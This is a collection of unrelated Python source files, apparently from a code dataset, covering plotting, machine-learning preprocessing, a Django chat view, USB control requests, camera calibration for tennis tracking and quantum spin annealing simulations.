pass
def held_out(labels, representations, behavior_subj, psychometric_params, **kwargs):
label_df = morphs.data.neurometric.null.make_label_df(
labels, behavior_subj, psychometric_params
)
behavior_df = morphs.data.neurometric.null.make_behavior_df(
behavior_subj, psychometric_params
)
merged_df = morphs.data.neurometric.null._merge_df(label_df, behavior_df)
held_out_df = morphs.data.neurometric.null.gen_held_out_df(
merged_df, representations, melt=True
)
g = grid(held_out_df, **kwargs)
return held_out_df, g
def grid(
held_out_df,
row_order=None,
col_order=None,
sup_title="",
legend=True,
legend_title="",
p_right_leg_label="Behavioral (True) values",
predicted_leg_label="Predicted values",
sub_title="",
):
held_out_df["legend"] = held_out_df["legend"].map(
{"p_right": p_right_leg_label, "predicted": predicted_leg_label}
)
if row_order is None:
row_order = np.sort(held_out_df["lesser_dim"].unique())
if col_order is None:
col_order = np.sort(held_out_df["greater_dim"].unique())
g = sns.lmplot(
x="morph_pos",
y="p_right",
hue="legend",
col="greater_dim",
row="lesser_dim",
data=held_out_df,
scatter=True,
fit_reg=False,
scatter_kws={"alpha": 0.3},
row_order=row_order,
col_order=col_order,
legend=False,
sharex=False,
)
g.map_dataframe(_4pl, "morph_pos", "p_right")
if legend:
g.add_legend(title=legend_title)
g = g.set_titles(sub_title)
morph_dims = held_out_df["morph_dim"].unique()
morphs.plot.format_morph_dim_label(g, row_order, col_order, morph_dims)
g.set(xlim=(0, 128), ylim=(0, 1), yticks=[0.0, 0.5, 1.0])
g.set_axis_labels("Morph Position", "P(right response)")
if sup_title:
plt.subplots_adjust(top=0.95)
g.fig.suptitle(sup_title)
return g
| StarcoderdataPython |
1688410 | <filename>1.py
def division(a, b):
try:
return a/b
except ZeroDivisionError:
raise ZeroDivisionError("На 0 делить нельзя")
| StarcoderdataPython |
3354358 | import socket
import time
def check_used(port: int) -> bool:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex(('127.0.0.1', port))
if result == 0:
sock.close()
return True
else:
return False
def alloc(start_from: int = 7000) -> int:
while True:
if check_used(start_from):
print("Port already used: %d" % start_from)
start_from += 1
else:
return start_from
def wait_for(port: int, timeout: int = 5) -> bool:
star_time = time.time()
while not check_used(port):
if time.time() - star_time > timeout:
return False
time.sleep(0.1)
return True
| StarcoderdataPython |
1794339 | from sklearn.metrics import confusion_matrix, f1_score, roc_curve
import numpy as np
import pandas as pd
class analysis:
def __init__(self):
pass
def _getComplexParams(self, abs=False):
"""
Function for extracting the data associated with
the second component of the complex source.
To call:
_getComplexParams(abs)
Parameters:
abs Take the absolute value of the difference
Postcondition:
The flux of the second component, the difference
in phases and depth between the two components,
and the noise value are stored in the data
frame "self.dfComplex_"
The model's predicted probability that
the source is complex is also stored.
"""
# ===================================================
# Determine which sources are complex
# ===================================================
loc = np.where(self.testLabel_ == 1)[0]
# ===================================================
# Retrieve the model's prediction that
# the complex source is complex
# ===================================================
prob = self.testProb_[loc]
# ===================================================
# Extract the flux of the second component
# ===================================================
flux = self.testFlux_[loc]
flux = np.asarray([f[1] for f in flux])
# ===================================================
# Compute the difference in phases
# ===================================================
chi = self.testChi_[loc]
chi = np.asarray([c[1] - c[0] for c in chi])
if abs: chi = np.abs(chi)
# ===================================================
# Compute the difference in Faraday depths
# ===================================================
depth = self.testDepth_[loc]
depth = np.asarray([d[1] - d[0] for d in depth])
if abs: depth = np.abs(depth)
# ===================================================
# Retrieve the noise parameter
# ===================================================
sig = self.testSig_[loc]
# ===================================================
# Convert to pandas series
# ===================================================
chi = pd.Series(chi, name='chi')
depth = pd.Series(depth, name='depth')
flux = pd.Series(flux, name='flux')
prob = pd.Series(prob, name='prob')
sig = pd.Series(sig, name="sig")
# ===================================================
# Store the results in a dataframe
# ===================================================
self.dfComplex_ = pd.concat([chi, depth, flux, prob, sig], axis=1)
def _getSimpleParams(self):
"""
Function for extracting the data associated with
the simple sources.
To call:
_getSimpleParams()
Parameters:
None
Postcondition:
"""
# ===================================================
# Determine which sources are complex
# ===================================================
loc = np.where(self.testLabel_ == 0)[0]
# ===================================================
# Retrieve the model's prediction that
# the complex source is complex
# ===================================================
prob = self.testProb_[loc]
# ===================================================
# Extract the flux
# ===================================================
flux = self.testFlux_[loc]
# ===================================================
# Extract the phase
# ===================================================
chi = self.testChi_[loc]
# ===================================================
# Extract the Faraday depth
# ===================================================
depth = self.testDepth_[loc]
# ===================================================
# Retrieve the noise parameter
# ===================================================
sig = self.testSig_[loc]
# ===================================================
# Convert to pandas series
# ===================================================
chi = pd.Series(chi, name='chi')
depth = pd.Series(depth, name='depth')
flux = pd.Series(flux, name='flux')
prob = pd.Series(prob, name='prob')
sig = pd.Series(sig, name="sig")
# ===================================================
# Store the results in a dataframe
# ===================================================
self.dfSimple_ = pd.concat([chi, depth, flux, prob, sig], axis=1)
def _getF1(self, step=0.025, save=False, suffix='', dir='./'):
try:
self.testProb_
except:
self._test()
threshold = np.arange(0.5, 1, step)
F1 = np.zeros_like(threshold)
for i, p in enumerate(threshold):
testPred = np.where(self.testProb_ > p, 1, 0)
F1[i] = f1_score(self.testLabel_, testPred)
self.threshold_ = threshold
self.F1_ = F1
if save:
np.save(dir + 'threshold' + suffix + '.npy', threshold)
np.save(dir + 'F1' + suffix + '.npy', F1)
def _getROC(self, data='test', save=False, suffix='', dir='./'):
try:
if data == 'train':
fpr, tpr, thresh = roc_curve(self.trainLabel_, self.trainProb_)
elif data == 'valid':
fpr, tpr, thresh = roc_curve(self.validLabel_, self.validProb_)
else:
fpr, tpr, thresh = roc_curve(self.testLabel_, self.testProb_)
except:
print("No data found. Aborting.")
sys.exit(1)
self.fpr_ = fpr
self.tpr_ = tpr
if save:
np.save(dir + 'fpr' + suffix + '.npy', fpr)
np.save(dir + 'tpr' + suffix + '.npy', tpr)
| StarcoderdataPython |
346521 | <filename>Ideas/Tennis Project/Source Code/Camera.py
import cv2
import numpy as np
class Camera:
CameraMatrix = [];
DistCoeffs = [];
Position = [];
RotationVec = [];
TranslationVec = [];
CourtCorners = [];
Homog = [];
# HALF_COURT_X = 4.115;
HALF_COURT_X = 5.485
HALF_COURT_Z = 11.885;
WORLD_POINTS = np.asarray([[-HALF_COURT_X, 0, -HALF_COURT_Z],
[ HALF_COURT_X, 0, -HALF_COURT_Z],
[ HALF_COURT_X, 0, HALF_COURT_Z],
[-HALF_COURT_X, 0, HALF_COURT_Z]], "float");
def __init__(self, cameraName, courtCorners):
if cameraName == "kyle":
fx=1994.25368447834;
fy=1988.65266798629;
cx=968.573023612607;
cy=511.585679422200;
k1=0.0771110325943740;
k2=-0.0596894545787290;
p1=0.00178967197419077;
p2=0.00123017525081653;
elif cameraName == "megan":
fx=1981.39204255929;
fy=1973.70141739089;
cx=980.523462971786;
cy=551.217098728122;
k1=0.0747612507420630;
k2=-0.0683271738685350;
p1=0.00240502474003212;
p2=0.00199735586169493;
else:
raise ValueError("cameraName must be 'kyle' or 'megan'!")
return;
self.CourtCorners = courtCorners.copy();
self.CameraMatrix = np.asarray([[fx, 0, cx], [0, fy, cy], [0, 0, 1]]);
self.DistCoeffs = np.asarray([ k1, k2, p1, p2 ]) #np.zeros((4,1)); # TODO: fill
# FIND CAMERA POSITION
imgCoords = np.transpose(courtCorners);
_, rVec, tVec = cv2.solvePnP(self.WORLD_POINTS.reshape((4,1,3)), np.asarray(courtCorners.reshape((4,1,2)), dtype="float"), self.CameraMatrix, self.DistCoeffs,flags=cv2.SOLVEPNP_ITERATIVE);
self.RotationVec = rVec.copy();
self.Rotation = cv2.Rodrigues(rVec)[0];
self.TranslationVec = tVec.copy();
R_inv = np.transpose(self.Rotation);
self.Position = - (np.matmul(R_inv,tVec))[:,0]
#print self.Position
# FIND MAPPING FROM CAM TO WORLD @ Y==0
camPoints = np.zeros((4,2), dtype="float32");
for i in range(0,4):
pt = self.GetPinholePoint(self.CourtCorners[i,:]);
camPoints[i,0] = pt[0]; # U coord
camPoints[i,1] = pt[1]; # V coord
worldPoints = self.WORLD_POINTS[:, [0,2]]
self.Homog = cv2.findHomography(camPoints, worldPoints)[0];
self.InvHomog = np.linalg.inv(self.Homog);
# Undistort the pixel position and convert it to pinhole coordinates w/ focal length 1
def GetPinholePoint(self, pt):
pts = np.zeros((1,1,2));
pts[0,0,0] = pt[0];
pts[0,0,1] = pt[1];
result = cv2.undistortPoints(pts, self.CameraMatrix, self.DistCoeffs);
xy = np.asarray([result[0,0,0], result[0,0,1]]);
return xy
# Convert a point from pixel position to court position
def ConvertPixelToCourtPosition(self, pt):
pinholePt = self.GetPinholePoint(pt);
# Convert a point from pinhole to court position
pt2 = np.asarray([pinholePt[0], pinholePt[1], 1.0]);
res = np.matmul(self.Homog, pt2);
res /= res[2];
return np.asarray([res[0], 0.0, res[1]]);
# Convert 3d point to 2d pixel position
def ConvertWorldToImagePosition(self, pt):
# solve for court point
pt1 = self.Position;
pt2 = pt;
t = - pt2[1] / (pt1[1] - pt2[1]);
isectPt = pt1 * t + pt2 * (1-t);
isectPt = np.asarray([isectPt[0], isectPt[2], 1.0]);
isectPtPinhole = np.matmul(self.InvHomog, isectPt.reshape(3,1));
isectPtPinhole /= isectPtPinhole[2];
pxPt = cv2.projectPoints(isectPtPinhole.reshape(1,1,3), np.identity(3), np.asarray([0,0,0], dtype="float"), self.CameraMatrix, self.DistCoeffs)[0][0][0];
pxPt = np.maximum(np.asarray([0,0]), pxPt);
return np.asarray(pxPt, dtype="uint32")
def GetRay(self, pxPosition):
ctPos = self.ConvertPixelToCourtPosition(pxPosition)
ctMinusCam = ctPos - self.Position;
return (self.Position, ctMinusCam / np.linalg.norm(ctMinusCam));
# output:
# pt is the closest point between rays
# dist is the distance of the two rays at their nearest crossing
# D is the corresponding point on ray1
# E is the corresponding point on ray2
def IntersectRays(ray1, ray2):
A = ray1[0];
a = ray1[1];
B = ray2[0];
b = ray2[1];
c = B - A;
aa = np.dot(a,a);
ac = np.dot(a,c);
bb = np.dot(b,b);
ab = np.dot(a,b);
bc = np.dot(b,c);
D = A + a * ((ac*bb - ab*bc) / (aa*bb - ab*ab));
E = B + b * ((ab*ac - bc*aa) / (aa*bb - ab*ab));
pt = (D+E)/2;
dist = np.linalg.norm(D-E);
return (pt, dist, D, E);
## TEST BENCH:
#from FindCourtCorners import CourtFinder
#cap = cv2.VideoCapture('../UntrackedFiles/stereoClip5_Megan.mov')
#_, frame = cap.read()
#cf = CourtFinder();
#cf.FindCourtCorners(frame);
#corners = np.asarray([[114,454],
# [766,444],
# [1805,835],
# [317,1034]]);
#kyleCam = Camera("kyle", corners);
#for i in range (0, 1):
# print kyleCam.ConvertWorldToImagePosition(np.asarray([0,3,0]));
| StarcoderdataPython |
3384076 | #list comprehension
x = [1, 2, 3, 4, 5]
y = []
for i in x:
y.append(i**2) #adicionar cada valor ao quadrado
print(x)
print(y)
#valor a adicionar + laço + condição
a = [6, 7, 8, 9, 10]
b = [i**2 for i in a]
print (a)
print (b)
#só os número impares
z = [i for i in a if i%2 == 1]
print (z)
| StarcoderdataPython |
9692124 | """Snakemake wrapper for PLASS Protein-Level Assembler."""
__author__ = "<NAME>"
__copyright__ = "Copyright 2018, <NAME>"
__email__ = "<EMAIL>"
__license__ = "MIT"
from os import path
from snakemake.shell import shell
extra = snakemake.params.get("extra", "")
#allow multiple input files for single assembly
left = snakemake.input.get("left")
single = snakemake.input.get("single")
assert left is not None or single is not None, "please check read inputs"
left = [snakemake.input.left] if isinstance(snakemake.input.left, str) else snakemake.input.left
right = snakemake.input.get("right")
if left:
right = [snakemake.input.right] if isinstance(snakemake.input.right, str) else snakemake.input.right
assert len(left) == len(right), "left input needs to contain the same number of files as the right input"
input_str_left = ' ' + " ".join(left)
input_str_right = ' ' + " ".join(right)
input_cmd = input_str_left + ' ' + input_str_right
else:
single = [snakemake.input.single] if isinstance(snakemake.input.single, str) else snakemake.input.single
input_cmd = ' ' + ' '.join(single)
outdir = path.dirname(snakemake.output[0])
tmpdir = path.join(outdir,'tmp')
log = snakemake.log_fmt_shell(stdout=False, stderr=True)
shell("plass assemble {input_cmd} {snakemake.output} {tmpdir} --threads {snakemake.threads} {snakemake.params.extra} {log}")
| StarcoderdataPython |
4802647 | <reponame>PlanTL-SANIDAD/covid-predictive-model
import os
import pandas as pd
if __name__ == '__main__':
dp_df = pd.read_csv("../../raw/06.utf8.csv", delimiter=';', index_col=False)
diag_columns = [col for col in dp_df.columns if 'DIA_' in col]
proc_columns = [col for col in dp_df.columns if 'PROC_' in col]
diag_rows = []
proc_rows = []
for _, row in dp_df.iterrows():
for diag_column in diag_columns:
if not pd.isna(row[diag_column]):
diag_rows.append({'patientid': row['PATIENT ID'], 'diag': row[diag_column]})
for proc_column in proc_columns:
if not pd.isna(row[proc_column]):
proc_rows.append({'patientid': row['PATIENT ID'], 'proc': row[proc_column]})
diag_df = pd.DataFrame(diag_rows)
diag_df_counts = diag_df.groupby(by='patientid').size().reset_index(name='counts')
proc_df = pd.DataFrame(proc_rows)
proc_df_counts = proc_df.groupby(by='patientid').size().reset_index(name='counts')
print(f"{diag_df_counts['counts'].mean()} & {proc_df_counts['counts'].mean()}")
print(f"{diag_df_counts['counts'].std()} & {proc_df_counts['counts'].std()}")
print(f"{diag_df_counts['counts'].median()} & {proc_df_counts['counts'].median()}")
print(f"{diag_df_counts['counts'].max() - diag_df_counts['counts'].min()} & {proc_df_counts['counts'].max() - proc_df_counts['counts'].min()}")
print(f"{diag_df_counts['counts'].min()} & {proc_df_counts['counts'].min()}")
print(f"{diag_df_counts['counts'].max()} & {proc_df_counts['counts'].max()}")
print(f"{diag_df_counts['counts'].sum()} & {proc_df_counts['counts'].sum()}")
print(f"{diag_df_counts['counts'].shape[0]} & {proc_df_counts['counts'].shape[0]}")
print(f"{len(set(diag_df['diag']))} & {len(set(proc_df['proc']))}")
| StarcoderdataPython |
11377422 | <filename>core/views.py
from django.shortcuts import render
from django.shortcuts import render_to_response
from django.template import RequestContext, loader
from django.http import HttpResponse
from django.views.generic import View
from ws4redis.redis_store import RedisMessage
from ws4redis.publisher import RedisPublisher
from ws4redis.redis_store import SELF
import json
def chat(request):
return render_to_response("chat.html", {}, context_instance=RequestContext(request))
def home(request):
return render_to_response("home.html", {}, context_instance=RequestContext(request))
def publishMessage(request):
message = "dummy"
toUser = request.GET['username']
if 'message' in request.GET:
message = request.GET['message']
redis_publisher = RedisPublisher(facility='notifications', users=[request.user.username, toUser])
data = {
'sender':request.user.username,
'message':message
}
message = RedisMessage(json.dumps(data))
redis_publisher.publish_message(message)
return HttpResponse("Published") | StarcoderdataPython |
1945222 | <reponame>sm2774us/amazon_interview_prep_2021
from functools import lru_cache
class Solution:
def numMusicPlaylists(self, N, L, K):
@lru_cache(None)
def dp(i, j): return +(j == 0) if not i else (dp(i-1, j-1) * (N-j+1) + dp(i-1, j) * max(j-K, 0)) % (10**9+7)
return dp(L, N) | StarcoderdataPython |
8168999 | # Copyright (C) 2009-2011 <NAME>
#
# The following terms apply to all files associated
# with the software unless explicitly disclaimed in individual files.
#
# The authors hereby grant permission to use, copy, modify, distribute,
# and license this software and its documentation for any purpose, provided
# that existing copyright notices are retained in all copies and that this
# notice is included verbatim in any distributions. No written agreement,
# license, or royalty fee is required for any of the authorized uses.
# Modifications to this software may be copyrighted by their authors
# and need not follow the licensing terms described here, provided that
# the new terms are clearly indicated on the first page of each file where
# they apply.
#
# IN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY
# FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES
# ARISING OUT OF THE USE OF THIS SOFTWARE, ITS DOCUMENTATION, OR ANY
# DERIVATIVES THEREOF, EVEN IF THE AUTHORS HAVE BEEN ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# THE AUTHORS AND DISTRIBUTORS SPECIFICALLY DISCLAIM ANY WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS SOFTWARE
# IS PROVIDED ON AN "AS IS" BASIS, AND THE AUTHORS AND DISTRIBUTORS HAVE
# NO OBLIGATION TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR
# MODIFICATIONS.
r"""usb.control - USB standard control requests
This module exports:
get_status - get recipeint status
clear_feature - clear a recipient feature
set_feature - set a recipient feature
get_descriptor - get a device descriptor
set_descriptor - set a device descriptor
get_configuration - get a device configuration
set_configuration - set a device configuration
get_interface - get a device interface
set_interface - set a device interface
"""
__author__ = '<NAME>'
__all__ = ['get_status',
'clear_feature',
'set_feature',
'get_descriptor',
'set_descriptor',
'get_configuration',
'set_configuration',
'get_interface',
'set_interface',
'ENDPOINT_HALT',
'FUNCTION_SUSPEND',
'DEVICE_REMOTE_WAKEUP',
'U1_ENABLE',
'U2_ENABLE',
'LTM_ENABLE']
import usb.util as util
import usb.core as core
def _parse_recipient(recipient, direction):
if recipient is None:
r = util.CTRL_RECIPIENT_DEVICE
wIndex = 0
elif isinstance(recipient, core.Interface):
r = util.CTRL_RECIPIENT_INTERFACE
wIndex = recipient.bInterfaceNumber
elif isinstance(recipient, core.Endpoint):
r = util.CTRL_RECIPIENT_ENDPOINT
wIndex = recipient.bEndpointAddress
else:
raise ValueError('Invalid recipient.')
bmRequestType = util.build_request_type(
direction,
util.CTRL_TYPE_STANDARD,
r
)
return (bmRequestType, wIndex)
# standard feature selectors from USB 2.0/3.0
ENDPOINT_HALT = 0
FUNCTION_SUSPEND = 0
DEVICE_REMOTE_WAKEUP = 1
U1_ENABLE = 48
U2_ENABLE = 49
LTM_ENABLE = 50
def get_status(dev, recipient = None):
r"""Return the status for the specified recipient.
dev is the Device object to which the request will be
sent to.
The recipient can be None (on which the status will be queried
on the device), an Interface or Endpoint descriptors.
The status value is returned as an integer with the lower
word being the two bytes status value.
"""
bmRequestType, wIndex = _parse_recipient(recipient, util.CTRL_IN)
ret = dev.ctrl_transfer(bmRequestType = bmRequestType,
bRequest = 0x00,
wIndex = wIndex,
data_or_wLength = 2)
return ret[0] | (ret[1] << 8)
def clear_feature(dev, feature, recipient = None):
r"""Clear/disable a specific feature.
dev is the Device object to which the request will be
sent to.
feature is the feature you want to disable.
The recipient can be None (on which the status will be queried
on the device), an Interface or Endpoint descriptors.
"""
bmRequestType, wIndex = _parse_recipient(recipient, util.CTRL_OUT)
dev.ctrl_transfer(bmRequestType = bmRequestType,
bRequest = 0x01,
wIndex = wIndex,
wValue = feature)
def set_feature(dev, feature, recipient = None):
r"""Set/enable a specific feature.
dev is the Device object to which the request will be
sent to.
feature is the feature you want to enable.
The recipient can be None (on which the status will be queried
on the device), an Interface or Endpoint descriptors.
"""
bmRequestType, wIndex = _parse_recipient(recipient, util.CTRL_OUT)
dev.ctrl_transfer(bmRequestType = bmRequestType,
bRequest = 0x03,
wIndex = wIndex,
wValue = feature)
def get_descriptor(dev, desc_size, desc_type, desc_index, wIndex = 0):
r"""Return the specified descriptor.
dev is the Device object to which the request will be
sent to.
desc_size is the descriptor size.
desc_type and desc_index are the descriptor type and index,
respectively. wIndex index is used for string descriptors
and represents the Language ID. For other types of descriptors,
it is zero.
"""
wValue = desc_index | (desc_type << 8)
bmRequestType = util.build_request_type(
util.CTRL_IN,
util.CTRL_TYPE_STANDARD,
util.CTRL_RECIPIENT_DEVICE
)
return dev.ctrl_transfer(
bmRequestType = bmRequestType,
bRequest = 0x06,
wValue = wValue,
wIndex = wIndex,
data_or_wLength = desc_size
)
def set_descriptor(dev, desc, desc_type, desc_index, wIndex = None):
r"""Update an existing descriptor or add a new one.
dev is the Device object to which the request will be
sent to.
The desc parameter is the descriptor to be sent to the device.
desc_type and desc_index are the descriptor type and index,
respectively. wIndex index is used for string descriptors
and represents the Language ID. For other types of descriptors,
it is zero.
"""
wValue = desc_index | (desc_type << 8)
bmRequestType = util.build_request_type(
util.CTRL_OUT,
util.CTRL_TYPE_STANDARD,
util.CTRL_RECIPIENT_DEVICE
)
dev.ctrl_transfer(
bmRequestType = bmRequestType,
bRequest = 0x07,
wValue = wValue,
wIndex = wIndex,
data_or_wLength = desc
)
def get_configuration(dev):
r"""Get the current active configuration of the device.
dev is the Device object to which the request will be
sent to.
This function differs from the Device.get_active_configuration
method because the later may use cached data, while this
function always does a device request.
"""
bmRequestType = util.build_request_type(
util.CTRL_IN,
util.CTRL_TYPE_STANDARD,
util.CTRL_RECIPIENT_DEVICE
)
return dev.ctrl_transfer(
bmRequestType,
bRequest = 0x08,
data_or_wLength = 1
)[0]
def set_configuration(dev, bConfigurationNumber):
r"""Set the current device configuration.
dev is the Device object to which the request will be
sent to.
"""
dev.set_configuration(bConfigurationNumber)
def get_interface(dev, bInterfaceNumber):
r"""Get the current alternate setting of the interface.
dev is the Device object to which the request will be
sent to.
"""
bmRequestType = util.build_request_type(
util.CTRL_IN,
util.CTRL_TYPE_STANDARD,
util.CTRL_RECIPIENT_INTERFACE
)
return dev.ctrl_transfer(
bmRequestType = bmRequestType,
bRequest = 0x0a,
wIndex = bInterfaceNumber,
data_or_wLength = 1
)[0]
def set_interface(dev, bInterfaceNumber, bAlternateSetting):
r"""Set the alternate setting of the interface.
dev is the Device object to which the request will be
sent to.
"""
dev.set_interface_altsetting(bInterfaceNumber, bAlternateSetting)
| StarcoderdataPython |
252259 | <gh_stars>0
#!python
# coding=utf-8
from .consumer import EasyAvroConsumer
from .producer import EasyAvroProducer, schema
__version__ = "2.2.0"
__all__ = [
'EasyAvroConsumer',
'EasyAvroProducer',
'schema'
]
| StarcoderdataPython |
198467 | <reponame>solex/presto<gh_stars>0
from copy import deepcopy
import simplejson as json
from presto.utils.fields import Field, MultipleObjectsField, FormField
from presto.utils.exceptions import ValidationError
def get_declared_fields(bases, attrs):
"""
Create a list of Model field instances from the passed in 'attrs', plus any
similar fields on the base classes (in 'bases').
"""
fields = [(field_name, attrs.pop(field_name)) \
for field_name, obj in attrs.items() \
if isinstance(obj, Field)]
fields.sort(key=lambda x: x[1].creation_counter)
for base in bases[::-1]:
if hasattr(base, 'declared_fields'):
fields = base.declared_fields.items() + fields
return fields
class DeclarativeFieldsMetaclass(type):
"""
Metaclass that converts Field attributes to a dictionary called
'base_fields', taking into account parent class 'base_fields' as well.
"""
def __new__(cls, name, bases, attrs):
attrs['base_fields'] = get_declared_fields(bases, attrs)
return super(DeclarativeFieldsMetaclass,
cls).__new__(cls, name, bases, attrs)
class Model(object):
"A collection of Fields, plus their associated data."
__metaclass__ = DeclarativeFieldsMetaclass
def __init__(self, data=None, parent=None):
self.data = data or {}
self.parent = parent
self.fields = deepcopy(self.base_fields)
fields = dict(self.fields)
for name, item in self.data.iteritems():
if fields.has_key(name):
field = fields[name]
field.value = self.data.get(name, field.DEFAULT_VALUE)
def __getattr__(self, name):
fields = dict(self.fields)
if fields.has_key(name):
return fields[name].value
return object.__getattribute__(self, name)
def __unicode__(self):
return "Data Model:" % self.data
@property
def errors(self):
"Returns an errors for the data provided for the Model"
if not hasattr(self, '_errors'):
self.clean()
return self._errors
def is_valid(self):
"""
Returns True if the Model has no errors. Otherwise, False.
"""
self.clean()
return not bool(self.errors)
def clean(self):
self._errors = {}
self.cleaned_data = {}
for name, field in self.fields:
if type(field) is MultipleObjectsField:
continue
kwargs = {}
if hasattr(self, 'validate_%s' % name):
kwargs['validation_func'] = getattr(self, 'validate_%s' % name)
if hasattr(self, 'get_text_%s' % name):
kwargs['text_func'] = getattr(self, 'get_text_%s' % name)
if hasattr(self, 'get_extra_params_%s' % name):
kwargs.update(getattr(self, 'get_extra_params_%s' % name)())
try:
self.cleaned_data[name] = field.clean(**kwargs)
except ValidationError, exc:
self._errors[name] = exc.messages
self.from_dict(self.cleaned_data)
def to_dict(self):
dict = {}
for fieldname, field in self.fields:
if type(field) is FormField:
continue
value = field.value
if isinstance(value, (list, tuple)):
dict[fieldname] = [val.to_dict() for val in value]
else:
dict[fieldname] = value
return dict
def from_dict(self, dict):
for fieldname, field in self.fields:
if type(field) is FormField:
continue
value = dict.get(fieldname, field.DEFAULT_VALUE)
field.set_value(value, parent=self)
def filter(self, fieldname, **kwargs):
def apply_filters(item, **kwargs):
for fieldname, value in kwargs.iteritems():
if getattr(item, fieldname) != value:
return False
return True
items = getattr(self, fieldname)
for item in items:
if apply_filters(item, **kwargs):
return item
return None | StarcoderdataPython |
5000400 | <gh_stars>0
from .resort import Resort
| StarcoderdataPython |
3471187 | """Sum the total area (in pixels) covered by a segmentation"""
import argparse
import numpy as np
from skimage.io import use_plugin, imread
use_plugin('freeimage')
def sum_segmented_area(segmentation_file):
im_array = imread(segmentation_file)
area = len(np.where(im_array != 0)[0])
return area
def main():
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('segmentation_file', help="File containing segmentation")
args = parser.parse_args()
print sum_segmented_area(args.segmentation_file)
if __name__ == '__main__':
main()
| StarcoderdataPython |
3224183 | # Data Preprocessing Template
# Importing the libraries
import numpy as np
#did this to see entire array
np.set_printoptions(threshold = np.nan)
import matplotlib.pyplot as plt
import pandas as pd
# Importing the dataset
dataset = pd.read_csv('Data.csv')
X = dataset.iloc[:, :-1].values
y = dataset.iloc[:, 3].values
#Taking care of missing data
from sklearn.preprocessing import Imputer
#Do command I for var info about Imputer class
imputer = Imputer(missing_values='NaN', strategy='mean', axis=0)
#selecting indices 1,2 here, lowerbound is inclusive, higherbound is not
imputer = imputer.fit(X[:, 1:3])
#setting the value of X at these indices to the new dataset values
X[:, 1:3] = imputer.transform(X[:, 1:3])
#Encoding categorical data
from sklearn.preprocessing import LabelEncoder, OneHotEncoder
labelencoder_X = LabelEncoder()
X[:, 0] = labelencoder_X.fit_transform(X[:, 0])
onehotencoder = OneHotEncoder(categorical_features = [0])
X = onehotencoder.fit_transform(X).toarray()
labelencoder_y = LabelEncoder()
y = labelencoder_X.fit_transform(y)
#splitting dataset
from sklearn.model_selection import train_test_split
#Random_state was only used to get some results as instructor
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)
#feature scaling
from sklearn.preprocessing import StandardScaler
sc_X = StandardScaler()
#train set must be fit AND transformed
X_train = sc_X.fit_transform(X_train)
#test must just be transformed
X_test = sc_X.transform(X_test)
| StarcoderdataPython |
6490215 | <reponame>weinbe58/tfim_noise
from quspin.basis import spin_basis_1d,tensor_basis,boson_basis_1d
from quspin.operators import hamiltonian
from quspin.tools.evolution import evolve
import numpy as np
import cProfile,os,sys,time
import matplotlib.pyplot as plt
def anneal_bath_1(L,Nb,T,gamma=0.2,omega=1.0,path="."):
ti = time.time()
filename = os.path.join(path,"spin_bath_exact_L_{}_Nb_{}_T_{}_gamma_{}_omega_{}.npz".format(L,Nb,T,gamma,omega))
if os.path.isfile(filename):
print "file_exists...exiting run."
exit()
if Nb%2 == 1:
S = "{}/2".format(Nb)
else:
S = "{}".format(Nb//2)
print "creating basis"
spin_basis = spin_basis_1d(L,pauli=True,kblock=0,pblock=1)
bath_basis = spin_basis_1d(1,S=S)
basis = tensor_basis(spin_basis,bath_basis)
print "L={}, H-space size: {}".format(L,basis.Ns)
bath_energy=[[omega/Nb,0]]
SB_list = [[gamma/np.sqrt(Nb),i,0] for i in range(L)]
h_list = [[-1,i] for i in range(L)]
J_list = [[-1,i,(i+1)%L] for i in range(L)]
A = lambda t:(t/T)**2
B = lambda t:(1-t/T)**2
static = [
["|z",bath_energy],
["+|-",SB_list],
["-|+",SB_list]
]
dynamic = [["x|",h_list,B,()],
["zz|",J_list,A,()],
]
print "creating hamiltonian"
kwargs=dict(basis=basis,dtype=np.float64,
check_symm=False,check_pcon=False,check_herm=False)
H = hamiltonian(static,dynamic,**kwargs)
print "solving initial state"
E0,psi_0 = H.eigsh(k=1,which="SA",time=0)
psi_0 = psi_0.ravel()
print "evolving"
out = np.zeros(psi_0.shape,dtype=np.complex128)
psi_f = evolve(psi_0,0,T,H._hamiltonian__omp_SO,f_params = (out,),
solver_name="dop853",atol=1.1e-10,rtol=1.1e-10)
print "saving"
np.savez_compressed(filename,psi=psi_f)
print "dome......{} sec".format(time.time()-ti)
def anneal_bath_2(L,Nb,T,gamma=0.2,omega=1.0,path="."):
ti = time.time()
filename = os.path.join(path,"spin_bath_exact_L_{}_Nb_{}_T_{}_gamma_{}_omega_{}.npz".format(L,Nb,T,gamma,omega))
if os.path.isfile(filename):
print "file_exists...exiting run."
exit()
if Nb%2 == 1:
S = "{}/2".format(Nb)
else:
S = "{}".format(Nb//2)
print "creating basis"
spin_basis = spin_basis_1d(L,pauli=True,kblock=0,pblock=1)
bath_basis = spin_basis_1d(1,S=S)
basis = tensor_basis(spin_basis,bath_basis)
print "L={}, H-space size: {}".format(L,basis.Ns)
bath_energy=[[omega/Nb,0]]
SB_list = [[gamma/np.sqrt(Nb),i,0] for i in range(L)]
h_list = [[-1,i] for i in range(L)]
J_list = [[-1,i,(i+1)%L] for i in range(L)]
A = lambda t:(t/T)**2
B = lambda t:(1-t/T)**2
static = [
["|z",bath_energy],
]
dynamic = [["zz|",J_list,A,()],
["x|",h_list,B,()],
["+|-",SB_list,B,()],
["-|+",SB_list,B,()]
]
print "creating hamiltonian"
kwargs=dict(basis=basis,dtype=np.float64,
check_symm=False,check_pcon=False,check_herm=False)
H = hamiltonian(static,dynamic,**kwargs)
print "solving initial state"
E0,psi_0 = H.eigsh(k=1,which="SA",time=0)
psi_0 = psi_0.ravel()
print "evolving"
out = np.zeros(psi_0.shape,dtype=np.complex128)
psi_f = evolve(psi_0,0,T,H._hamiltonian__omp_SO,f_params = (out,),
solver_name="dop853",atol=1.1e-10,rtol=1.1e-10)
psi_f /= np.linalg.norm(psi_f)
print "saving"
